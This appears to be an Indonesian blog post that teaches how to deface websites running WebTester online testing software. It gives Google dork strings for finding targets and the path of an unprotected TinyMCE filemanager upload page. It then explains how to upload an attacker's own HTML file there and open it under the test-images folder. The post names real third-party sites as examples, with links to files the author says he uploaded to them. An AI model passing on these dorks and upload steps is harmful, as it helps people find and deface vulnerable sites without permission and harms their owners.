Langsung saja bro ....
Google Dork :
- intext:Copyright © 2003 - 2010 Eppler Software
- inurl:/go.php?testID=
- intitle:WebTester Online Testing
saya pake Dork : intext:Copyright © 2003 - 2010 Eppler Software
Dan saya pake contoh site : http://www.engunneer.com/quiz/directions.php?testID=2
Exploit nya :
http://[Site]/[Path]/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
jadi URL website : http://www.engunneer.com/quiz/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
jika sudah di kasi exploit tekan enter ....
ini tampilan Jika website nya bisa di masukkan file HTML kita ...
kalau sudah seperti ini .... klik Pada Choose File , masukan file Html kamu ....
lalu klik Upload ...
jika sudah ter Upolad akan terlihat ada file kamu di situ ...
Nah jika sudah ada File kamu di situ ...... cara bukanya ....
- test-images/NamaFileKamu.html
http://Site/Path/test-images/NamaFileKamu.html
Contoh punya Saya ... ;
http://www.engunneer.com/quiz/test-images/xxx.html
http://www.historyheritagehockey.com/webtester5/test-images/goblin.html
http://www.engunneer.com/quiz/test-images/xxx.html
http://www.historyheritagehockey.com/webtester5/test-images/goblin.html
Inilah hasil akhirnya .......
Terima kasih .....
0 komentar:
Catat Ulasan